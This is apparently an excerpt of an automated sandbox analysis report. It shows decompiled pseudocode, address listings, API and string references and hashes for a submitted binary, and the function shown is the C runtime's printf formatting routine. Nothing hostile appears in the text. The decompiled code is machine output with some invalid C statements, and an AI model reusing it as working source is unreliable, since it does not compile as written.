					}
					L82:
					_t593 =  *0x4bc060; // 0x408114
					 *(_t623 - 4) = _t593;
					_t497 = E00410910( *(_t623 - 4));
					_t626 = _t626 + 4;
					 *(_t623 - 0x24) = _t497;
					goto L86;
				}
			}

0x00422075
0x00422075
0x00422075
0x00422079
0x0042207e
0x00422081
0x0042208e
0x00000000
0x00000000
0x00422090
0x00422090
0x0042209a
0x004220b6
0x004220b9
0x004220bf
0x004220e7
0x004220ee
0x004220f4
0x004220f7
0x004220fa
0x00422100
0x00422103
0x004220c1
0x004220c1
0x004220c7
0x004220ca
0x004220cd
0x004220d3
0x004220d6
0x004220d9
0x004220db
0x004220de
0x004220de
0x00422106
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x004227dc
0x004227e2
0x004227ec
0x00422801
0x00422816
0x00422818
0x0042281c
0x0042281c
0x00422803
0x00422803
0x00422807
0x00422807
0x004227ee
0x004227ee
0x004227f2
0x004227f2
0x004227ec
0x0042282c
0x00422838
0x0042284e
0x00422853
0x00422853
0x00422869
0x0042286e
0x00422877
0x0042287f
0x00422895
0x0042289a
0x0042289a
0x0042287f
0x004228a1
0x00422975
0x00422988
0x0042298d
0x00000000
0x004228a7
0x004228a7
0x004228ab
0x00000000
0x00000000
0x004228b1
0x004228b1
0x004228be
0x004228c7
0x004228cd
0x004228cd
0x004228dc
0x004228e4
0x00000000
0x00000000
0x004228ea
0x004228f3
0x00422912
0x00422917
0x0042291a
0x00422929
0x00422936
0x00422941
0x00422941
0x00000000
0x00422941
0x00422938
0x0042293f
0x0042294d
0x00422966
0x0042296b
0x00000000
0x0042296b
0x00000000
0x0042293f
0x00422973
0x00422990
0x00422997
0x0042299f
0x004229b5
0x004229ba
0x004229ba
0x0042299f
0x00422997
0x004229bd
0x004229c1
0x004229c9
0x004229ce
0x004229d1
0x004229d1
0x004229d8
0x004229d8
0x00421aaf
0x00421ab5
0x00421ac2
0x00421ac7
0x00000000
0x00421ada
0x00421ae4
0x00421b0b
0x00421af2
0x00421b03
0x00421b03
0x00421ae4
0x00421b15
0x00421b1b
0x00421b27
0x00421b2a
0x00421b38
0x00421b3b
0x00421b48
0x00421bed
0x00421bf3
0x00421c00
0x00000000
0x00000000
0x00421c06
0x00421c0c
0x00000000
0x00421c13
0x00421c13
0x00421c2b
0x00421c30
0x00421c33
0x00421c35
0x00421cef
0x00421d02
0x00421d07
0x00000000
0x00421c3b
0x00421c4e
0x00421c53
0x00421c59
0x00421c5b
0x00421c64
0x00421c64
0x00421c67
0x00421c73
0x00421c77
0x00421c7d
0x00421c7f
0x00421c84
0x00421c86
0x00421c8b
0x00421c90
0x00421c92
0x00421c97
0x00421c9a
0x00421c9d
0x00421c9f
0x00421c9f
0x00421c9d
0x00421ca0
0x00421ca0
0x00421ca7
0x00000000
0x00421ca9
0x00421cae
0x00421cca
0x00421cd2
0x00421cdf
0x00421ce4
0x00000000
0x00421ce4
0x00421ca7
0x00000000
0x00421d0f
0x00421d0f
0x00421d16
0x00421d19
0x00421d1c
0x00421d1f
0x00421d22
0x00421d25
0x00421d28
0x00421d2f
0x00421d36
0x00000000
0x00000000
0x00421d42
0x00421d42
0x00421d49
0x00421d55
0x00421d58
0x00421d5e
0x00421d65
0x00000000
0x00000000
0x00421d67
0x00421d67
0x00421d6d
0x00421d6d
0x00421d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421db7
0x00421db7
0x00421dbe
0x00421dc1
0x00421deb
0x00421dee
0x00421dee
0x00421df1
0x00421df8
0x00421df8
0x00421dfc
0x00421dc3
0x00421dc3
0x00421dcf
0x00421dd2
0x00421dd6
0x00421dd8
0x00421ddb
0x00421ddb
0x00421dde
0x00421de4
0x00421de6
0x00421de6
0x00421de9
0x00000000
0x00000000
0x00421e04
0x00421e04
0x00000000
0x00000000
0x00421e10
0x00421e10
0x00421e17
0x00421e1a
0x00421e3a
0x00421e3d
0x00421e3d
0x00421e47
0x00421e47
0x00421e4b
0x00421e1c
0x00421e1c
0x00421e28
0x00421e2b
0x00421e2f
0x00421e31
0x00421e31
0x00421e38
0x00000000
0x00000000
0x00421e53
0x00421e53
0x00421e5a
0x00421e66
0x00421e69
0x00421e6f
0x00421e76
0x00421f89
0x00000000
0x00421f89
0x00421e7c
0x00421e7c
0x00421e82
0x00421e82
0x00421e89
0x00000000
0x00421ebf
0x00421ebf
0x00421ec2
0x00421ec5
0x00421ec8
0x00421ef0
0x00421ef0
0x00421ef3
0x00421ef6
0x00421ef9
0x00421f1e
0x00421f1e
0x00421f21
0x00421f24
0x00421f27
0x00421f60
0x00421f71
0x00000000
0x00421f71
0x00421f29
0x00421f29
0x00421f2c
0x00421f2f
0x00421f32
0x00000000
0x00000000
0x00421f34
0x00421f34
0x00421f37
0x00421f3a
0x00421f3d
0x00000000
0x00000000
0x00421f3f
0x00421f3f
0x00421f42
0x00421f45
0x00421f48
0x00000000
0x00000000
0x00421f4a
0x00421f4a
0x00421f4d
0x00421f50
0x00421f53
0x00000000
0x00000000
0x00421f55
0x00421f55
0x00421f58
0x00421f5b
0x00421f5e
0x00421f62
0x00000000
0x00421f62
0x00000000
0x00421f5e
0x00421efb
0x00421efb
0x00421efe
0x00421f02
0x00421f05
0x00000000
0x00421f07
0x00421f0a
0x00421f0d
0x00421f10
0x00421f13
0x00421f19
0x00000000
0x00421f19
0x00421f05
0x00421eca
0x00421eca
0x00421ecd
0x00421ed1
0x00421ed4
0x00000000
0x00421ed6
0x00421ed9
0x00421edc
0x00421edf
0x00421ee2
0x00421ee8
0x00000000
0x00421ee8
0x00000000
0x00421f73
0x00421f76
0x00421f79
0x00000000
0x00000000
0x00421e90
0x00421e90
0x00421e93
0x00421e96
0x00421e99
0x00421eb1
0x00421eb4
0x00421eb4
0x00421eb7
0x00421e9b
0x00421e9e
0x00421ea1
0x00421ea7
0x00421eac
0x00421eac
0x00000000
0x00000000
0x00421f7e
0x00421f7e
0x00421f81
0x00421f81
0x00421f86
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f8e
0x00421f8e
0x00421f95
0x00421fa1
0x00421fa4
0x00421faa
0x00421fb1
0x00000000
0x004227d2
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x0042278c
0x0042278f
0x00422792
0x00422795
0x00422798
0x0042279b
0x004227a1
0x004227a1
0x004227a1
0x004227a9
0x004227ad
0x00000000
0x00000000
0x004227af
0x004227af
0x004227b2
0x004227b5
0x004227b5
0x004227ba
0x004227bd
0x004227c0
0x004227c3
0x004227c6
0x004227c9
0x004227cc
0x004227cc
0x004227cf
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00421fb7
0x00421fbd
0x00421fbd
0x00421fc4
0x00000000
0x0042231e
0x0042231e
0x00422325
0x0042232c
0x0042232c
0x0042232f
0x00000000
0x00000000
0x00421fcb
0x00421fce
0x00421fce
0x00421fd4
0x00421fd6
0x00421fd9
0x00421fd9
0x00421fde
0x00421fde
0x00000000
0x00000000
0x0042210b
0x0042210e
0x0042210e
0x00422113
0x00422115
0x00422118
0x00422118
0x0042211e
0x0042211e
0x00000000
0x00000000
0x004224eb
0x004224eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00422335
0x00422338
0x0042233b
0x0042233e
0x00422344
0x00422347
0x0042234e
0x00422352
0x0042235d
0x0042235d
0x00422361
0x00422378
0x00422378
0x0042237f
0x00422381
0x00422381
0x00422388
0x00422388
0x0042238f
0x004223a0
0x004223af
0x004223b2
0x004223b6
0x004223cc
0x004223b8
0x004223b8
0x004223bb
0x004223c1
0x004223c7
0x004223c7
0x004223b6
0x004223d6
0x004223d9
0x004223dc
0x004223df
0x004223e2
0x004223e5
0x004223eb
0x004223f1
0x004223f9
0x004223fa
0x004223fd
0x004223fe
0x00422401
0x00422402
0x00422409
0x0042240a
0x0042240d
0x0042240e
0x00422411
0x00422412
0x00422418
0x00422419
0x00422427
0x00422429
0x0042242f
0x0042242f
0x00422435
0x00422437
0x0042243b
0x0042243d
0x00422445
0x00422446
0x00422449
0x0042244a
0x00422458
0x0042245a
0x0042245a
0x0042243b
0x0042245d
0x00422464
0x00422467
0x0042246c
0x0042246c
0x00422472
0x00422474
0x0042247c
0x0042247d
0x00422480
0x00422481
0x00422490
0x00422492
0x00422492
0x00422472
0x00422495
0x00422498
0x0042249b
0x0042249e
0x004224a3
0x004224a9
0x004224ac
0x004224af
0x004224af
0x004224b2
0x004224b2
0x004224b5
0x004224c1
0x00000000
0x004224c1
0x00422363
0x00422363
0x0042236a
0x0042236d
0x00000000
0x00000000
0x0042236f
0x0042236f
0x00000000
0x0042236f
0x00422354
0x00422354
0x00000000
0x00000000
0x00421fe1
0x00421fe4
0x00421fe4
0x00421fea
0x00422045
0x0042204d
0x00422054
0x0042205a
0x00422060
0x00421fec
0x00421fec
0x00421ff6
0x00421ffa
0x00422002
0x00422009
0x00422016
0x0042201d
0x00422029
0x0042202f
0x00422036
0x00422038
0x00422038
0x0042203f
0x00422067
0x0042206d
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x00000000
0x004224c9
0x004224cc
0x004224cf
0x004224d2
0x00000000
0x00000000
0x00422227
0x00422227
0x00422233
0x00422239
0x0042223e
0x00422240
0x004222ea
0x004222ed
0x004222ed
0x004222f0
0x00422304
0x0042230a
0x00422310
0x004222f2
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00422246
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x0042226c
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422290
0x00422293
0x00422295
0x00422295
0x00422293
0x00422296
0x0042229d
0x004222e5
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00000000
0x004222da
0x00000000
0x0042252c
0x0042252c
0x00422536
0x00422536
0x0042253c
0x0042253e
0x00422541
0x00422541
0x00422547
0x00422547
0x00000000
0x00000000
0x004224e4
0x004224e4
0x00000000
0x00000000
0x00422121
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x0042215a
0x00422160
0x004221c7
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f4
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422201
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x00422216
0x0042221c
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422195
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00000000
0x004224db
0x004224db
0x00000000
0x00000000
0x004224f7
0x004224f7
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x0042254a
0x0042254d
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x00422606
0x0042260a
0x00422612
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225eb
0x004225ef
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c5
0x004225d1
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225a9
0x004225ad
0x004225b5
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x0042257c
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422554
0x00422560
0x00422566
0x00422566
0x00422623
0x00422623
0x00422626
0x00422668
0x00422668
0x0042266e
0x00422674
0x0042267a
0x00000000
0x00422628
0x00422628
0x00422628
0x0042262f
0x00000000
0x00000000
0x00422631
0x00422631
0x0042263c
0x00422642
0x00422644
0x0042264a
0x0042264d
0x0042264f
0x00422655
0x0042265e
0x00422663
0x00422680
0x00422683
0x00422683
0x00422688
0x0042268d
0x0042268d
0x00422693
0x00422695
0x0042269b
0x004226a1
0x004226a1
0x004226aa
0x004226aa
0x00422693
0x004226b0
0x004226b4
0x004226c2
0x004226c5
0x004226c8
0x004226cf
0x004226d1
0x004226d1
0x004226b6
0x004226b6
0x004226b6
0x004226de
0x004226de
0x004226e4
0x004226e6
0x004226e6
0x004226ed
0x004226f0
0x004226f3
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00422703
0x00422709
0x00422709
0x0042270f
0x00000000
0x00000000
0x00422711
0x00422711
0x00422714
0x00422717
0x0042271e
0x00422725
0x0042272d
0x00422733
0x00422736
0x00422739
0x00422740
0x0042274c
0x00422752
0x00422758
0x0042275f
0x00422761
0x00422767
0x00422767
0x0042276d
0x0042276d
0x00422773
0x00422776
0x0042277c
0x00422781
0x00422784
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00000000
0x00422701
0x004226f3
0x00422633
0x00422633
0x0042263a
0x00000000
0x00000000
0x00000000
0x0042263a
0x00000000
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x00000000
0x00421d91
0x00421d94
0x00421d97
0x00000000
0x00000000
0x00421d9c
0x00421d9f
0x00421da4
0x00000000
0x00000000
0x00421d86
0x00421d86
0x00421d89
0x00421d8c
0x00000000
0x00000000
0x00421d7b
0x00421d7e
0x00421d81
0x00000000
0x00000000
0x00421da9
0x00421da9
0x00421dac
0x00421dac
0x00421daf
0x00000000
0x00000000
0x00421db2
0x00000000
0x00000000
0x00421b4e
0x00421b50
0x00421b5e
0x00421b52
0x00421b52
0x00421b52
0x00421b68
0x00421b6e
0x00421b7b
0x00421b7d
0x00421b82
0x00421b84
0x00421b89
0x00421b8e
0x00421b90
0x00421b95
0x00421b9b
0x00421b9d
0x00421b9d
0x00421b9b
0x00421b9e
0x00421ba5
0x00000000
0x00421ba7
0x00421bac
0x00421bc8
0x00421bd0
0x00421bdd
0x00421be2
0x00422aa1
0x00422aae
0x00422aae
0x00421ba5
0x00421b48
0x004229dd
0x004229e4
0x004229fb
0x004229fb
0x00422a05
0x00422a05
0x00422a0b
0x00422a18
0x00422a1a
0x00422a1f
0x00422a21
0x00422a26
0x00422a2b
0x00422a2d
0x00422a32
0x00422a38
0x00422a3a
0x00422a3a
0x00422a38
0x00422a42
0x00422a8d
0x00422a96
0x00422a9b
0x00422a44
0x00422a49
0x00422a65
0x00422a6d
0x00422a7a
0x00422a7f
0x00422a7f
0x00000000
0x00422a42
0x004229e6
0x004229ed
0x00000000
0x00000000
0x004229ef
0x004229ef
0x00000000
0x004229ef
0x004227d2
0x0042209c
0x0042209c
0x004220a2
0x004220a9
0x004220ae
0x004220b1
0x00000000
0x004220b1

APIs

_get_int_arg.LIBCMTD ref: 00422079
_strlen.LIBCMT ref: 004220A9
_write_multi_char.LIBCMTD ref: 0042284E
_write_string.LIBCMTD ref: 00422869
_write_multi_char.LIBCMTD ref: 00422895
_wctomb_s.LIBCMTD ref: 00422912

Strings

("Incorrect format specifier", 0), xrefs: 00421B7D, 00421BC3
f:\dd\vctools\crt_bld\self_x86\crt\src\output.c, xrefs: 00421B89, 00421BB9
-, xrefs: 004227EE
_output_s_l, xrefs: 00421BBE

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: _write_multi_char$_get_int_arg_strlen_wctomb_s_write_string
String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
API String ID: 2232461714-3257747220
Opcode ID: ab27924deb3956283dc3498d77047f7e5de99e6ed9f70ae6d808bb9cd7fab935
Instruction ID: 8a5de49c2e348729441b2b120d26cb9e8f304e3e49c627a362eee598c26a33e7
Opcode Fuzzy Hash: ab27924deb3956283dc3498d77047f7e5de99e6ed9f70ae6d808bb9cd7fab935
Instruction Fuzzy Hash: 56A170B4E012289FDB24DF54DD89BEEB7B0BB44304F5081DAE4096A291D7B89EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004233C4 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E004233C4(void* __eflags) {
				intOrPtr _t482;
				signed int _t484;
				signed int _t487;
				void* _t492;
				signed int _t494;
				void* _t502;
				void* _t520;
				signed int _t524;
				void* _t534;
				signed int _t567;
				signed int _t573;
				void* _t594;
				void* _t595;
				signed int _t596;
				void* _t598;
				void* _t599;

				L0:
				while(1) {
					L0:
					_t482 = E0041F270(_t596 + 0x14);
					_t599 = _t598 + 4;
					 *((intOrPtr*)(_t596 - 0x474)) = _t482;
					if( *((intOrPtr*)(_t596 - 0x474)) == 0) {
						goto L76;
					}
					L75:
					__ecx =  *(__ebp - 0x474);
					if( *(__ecx + 4) != 0) {
						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
						if(( *(__ebp - 0x10) & 0x00000800) == 0) {
							 *(__ebp - 0xc) = 0;
							__edx =  *(__ebp - 0x474);
							__eax =  *(__edx + 4);
							 *(__ebp - 4) =  *(__edx + 4);
							__ecx =  *(__ebp - 0x474);
							__edx =  *__ecx;
							 *(__ebp - 0x24) =  *__ecx;
						} else {
							__edx =  *(__ebp - 0x474);
							__eax =  *(__edx + 4);
							 *(__ebp - 4) =  *(__edx + 4);
							__ecx =  *(__ebp - 0x474);
							__eax =  *__ecx;
							asm("cdq");
							 *__ecx - __edx =  *__ecx - __edx >> 1;
							 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
							 *(__ebp - 0xc) = 1;
						}
						L80:
						while(1) {
							L187:
							if( *(_t596 - 0x28) != 0) {
								goto L212;
							}
							L188:
							if(( *(_t596 - 0x10) & 0x00000040) != 0) {
								if(( *(_t596 - 0x10) & 0x00000100) == 0) {
									if(( *(_t596 - 0x10) & 0x00000001) == 0) {
										if(( *(_t596 - 0x10) & 0x00000002) != 0) {
											 *((short*)(_t596 - 0x14)) = 0x20;
											 *(_t596 - 0x1c) = 1;
										}
									} else {
										 *((short*)(_t596 - 0x14)) = 0x2b;
										 *(_t596 - 0x1c) = 1;
									}
								} else {
									 *((short*)(_t596 - 0x14)) = 0x2d;
									 *(_t596 - 0x1c) = 1;
								}
							}
							 *((intOrPtr*)(_t596 - 0x4ac)) =  *((intOrPtr*)(_t596 - 0x18)) -  *(_t596 - 0x24) -  *(_t596 - 0x1c);
							if(( *(_t596 - 0x10) & 0x0000000c) == 0) {
								E00423F90(0x20,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
								_t599 = _t599 + 0x10;
							}
							E00423FD0( *(_t596 - 0x1c), _t596 - 0x14,  *(_t596 - 0x1c),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
							_t599 = _t599 + 0x10;
							if(( *(_t596 - 0x10) & 0x00000008) != 0) {
								if(( *(_t596 - 0x10) & 0x00000004) == 0) {
									E00423F90(0x30,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
									_t599 = _t599 + 0x10;
								}
							}
							if( *(_t596 - 0xc) != 0) {
								L208:
								E00423FD0( *(_t596 - 0x24),  *(_t596 - 4),  *(_t596 - 0x24),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
								_t599 = _t599 + 0x10;
								goto L209;
							} else {
								L201:
								if( *(_t596 - 0x24) <= 0) {
									goto L208;
								}
								L202:
								 *(_t596 - 0x4b0) =  *(_t596 - 4);
								 *(_t596 - 0x4b4) =  *(_t596 - 0x24);
								while(1) {
									L203:
									 *(_t596 - 0x4b4) =  *(_t596 - 0x4b4) - 1;
									if( *(_t596 - 0x4b4) <= 0) {
										break;
									}
									L204:
									_t520 = E004103A0(_t596 - 0x40);
									_t524 = E00420B60(_t596 - 0x458,  *(_t596 - 0x4b0),  *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t596 - 0x40))) + 0xac)), _t520);
									_t599 = _t599 + 0x10;
									 *(_t596 - 0x4b8) = _t524;
									if( *(_t596 - 0x4b8) > 0) {
										L206:
										E00423F30( *(_t596 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
										_t599 = _t599 + 0xc;
										 *(_t596 - 0x4b0) =  *(_t596 - 0x4b0) +  *(_t596 - 0x4b8);
										continue;
									}
									L205:
									 *(_t596 - 0x44c) = 0xffffffff;
									break;
								}
								L207:
								L209:
								if( *(_t596 - 0x44c) >= 0) {
									if(( *(_t596 - 0x10) & 0x00000004) != 0) {
										E00423F90(0x20,  *((intOrPtr*)(_t596 - 0x4ac)),  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
										_t599 = _t599 + 0x10;
									}
								}
							}
							L212:
							if( *(_t596 - 0x20) != 0) {
								L0040F230( *(_t596 - 0x20), 2);
								_t599 = _t599 + 8;
								 *(_t596 - 0x20) = 0;
							}
							while(1) {
								L214:
								 *(_t596 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc))));
								_t535 =  *(_t596 - 0x454) & 0x0000ffff;
								 *((intOrPtr*)(_t596 + 0xc)) =  *((intOrPtr*)(_t596 + 0xc)) + 2;
								if(( *(_t596 - 0x454) & 0x0000ffff) == 0 ||  *(_t596 - 0x44c) < 0) {
									break;
								} else {
									if(( *(_t596 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t596 - 0x454) & 0x0000ffff) > 0x78) {
										 *(_t596 - 0x4d8) = 0;
									} else {
										 *(_t596 - 0x4d8) =  *(( *(_t596 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
									}
								}
								L7:
								 *(_t596 - 0x450) =  *(_t596 - 0x4d8);
								_t573 =  *(_t596 - 0x450) * 9;
								_t494 =  *(_t596 - 0x45c);
								_t543 = ( *(_t573 + _t494 + 0x4081a0) & 0x000000ff) >> 4;
								 *(_t596 - 0x45c) = ( *(_t573 + _t494 + 0x4081a0) & 0x000000ff) >> 4;
								if( *(_t596 - 0x45c) != 8) {
									L16:
									 *(_t596 - 0x4e0) =  *(_t596 - 0x45c);
									if( *(_t596 - 0x4e0) > 7) {
										continue;
									}
									L17:
									switch( *((intOrPtr*)( *(_t596 - 0x4e0) * 4 +  &M00423E24))) {
										case 0:
											L18:
											 *(_t596 - 0xc) = 1;
											E00423F30( *(_t596 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t596 + 8)), _t596 - 0x44c);
											_t599 = _t599 + 0xc;
											goto L214;
										case 1:
											L19:
											 *(__ebp - 0x2c) = 0;
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x28) = __ecx;
											__edx =  *(__ebp - 0x28);
											 *(__ebp - 0x18) =  *(__ebp - 0x28);
											__eax =  *(__ebp - 0x18);
											 *(__ebp - 0x1c) =  *(__ebp - 0x18);
											 *(__ebp - 0x10) = 0;
											 *(__ebp - 0x30) = 0xffffffff;
											 *(__ebp - 0xc) = 0;
											goto L214;
										case 2:
											L20:
											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
											 *(__ebp - 0x4e4) = __ecx;
											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
											__eflags =  *(__ebp - 0x4e4) - 0x10;
											if( *(__ebp - 0x4e4) > 0x10) {
												goto L27;
											}
											L21:
											_t59 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
											__ecx =  *_t59 & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
												case 0:
													goto L24;
												case 1:
													goto L25;
												case 2:
													goto L23;
												case 3:
													goto L22;
												case 4:
													goto L26;
												case 5:
													goto L27;
											}
										case 3:
											L28:
											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
												__edx =  *(__ebp - 0x18);
												__edx =  *(__ebp - 0x18) * 0xa;
												__eflags = __edx;
												_t83 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
												__ecx = __edx + _t83;
												 *(__ebp - 0x18) = __ecx;
											} else {
												__edx = __ebp + 0x14;
												 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x18);
												if( *(__ebp - 0x18) < 0) {
													__eax =  *(__ebp - 0x10);
													__eax =  *(__ebp - 0x10) | 0x00000004;
													__eflags = __eax;
													 *(__ebp - 0x10) = __eax;
													__ecx =  *(__ebp - 0x18);
													__ecx =  ~( *(__ebp - 0x18));
													 *(__ebp - 0x18) = __ecx;
												}
											}
											L33:
											goto L214;
										case 4:
											L34:
											 *(__ebp - 0x30) = 0;
											goto L214;
										case 5:
											L35:
											__edx =  *(__ebp - 0x454) & 0x0000ffff;
											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
												__ecx =  *(__ebp - 0x30);
												__ecx =  *(__ebp - 0x30) * 0xa;
												__eflags = __ecx;
												_t94 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
												__eax = __ecx + _t94;
												 *(__ebp - 0x30) = __ecx + _t94;
											} else {
												__eax = __ebp + 0x14;
												 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
												__eflags =  *(__ebp - 0x30);
												if( *(__ebp - 0x30) < 0) {
													 *(__ebp - 0x30) = 0xffffffff;
												}
											}
											goto L214;
										case 6:
											L41:
											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
											 *(__ebp - 0x4e8) = __ecx;
											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
											__eflags =  *(__ebp - 0x4e8) - 0x2e;
											if( *(__ebp - 0x4e8) > 0x2e) {
												L64:
												goto L214;
											}
											L42:
											_t102 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
											__ecx =  *_t102 & 0x000000ff;
											switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
												case 0:
													L47:
													__ecx =  *(__ebp + 0xc);
													__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
														L50:
														__ecx =  *(__ebp + 0xc);
														__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
														__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
														if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
															L53:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx & 0x0000ffff;
															__eflags = ( *__ecx & 0x0000ffff) - 0x64;
															if(( *__ecx & 0x0000ffff) == 0x64) {
																L59:
																L61:
																goto L64;
															}
															L54:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = __ecx - 0x69;
															if(__ecx == 0x69) {
																goto L59;
															}
															L55:
															__edx =  *(__ebp + 0xc);
															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
															if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																goto L59;
															}
															L56:
															__ecx =  *(__ebp + 0xc);
															__edx =  *__ecx & 0x0000ffff;
															__eflags = ( *__ecx & 0x0000ffff) - 0x75;
															if(( *__ecx & 0x0000ffff) == 0x75) {
																goto L59;
															}
															L57:
															__eax =  *(__ebp + 0xc);
															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
															__eflags = __ecx - 0x78;
															if(__ecx == 0x78) {
																goto L59;
															}
															L58:
															__edx =  *(__ebp + 0xc);
